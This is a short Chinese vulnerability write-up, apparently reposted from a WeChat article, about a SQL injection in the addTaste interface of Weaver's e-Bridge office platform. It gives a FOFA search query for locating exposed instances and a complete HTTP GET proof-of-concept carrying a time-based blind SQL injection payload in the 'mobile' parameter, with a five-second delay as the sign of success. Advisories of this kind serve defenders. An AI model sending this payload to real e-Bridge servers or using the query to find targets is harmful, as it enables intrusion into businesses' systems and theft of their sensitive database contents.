一、漏洞描述
e-Bridge 提供了一套全面的办公自动化工具,包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞,通过此漏洞攻击者可获取企业数据库敏感数据。
二、网络空间搜索引擎搜索
fofa查询
app="泛微-云桥e-Bridge"三、漏洞复现
POC
GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: EBRIDGE_JSESSIONID=BF3613ADC70058668E528E7045C15A81DNT: 1Connection: closeUpgrade-Insecure-Requests: 1
延迟时间大于5秒
四、漏洞检测
pocsuite3漏洞检测
文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498738&idx=2&sn=e50289f88198dea79f93cf493e01f229&chksm=966cc583392835a710555baa14a46e4ad23ad7482315ad34fd3ed4cd1bfe69c78956bdea487a&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh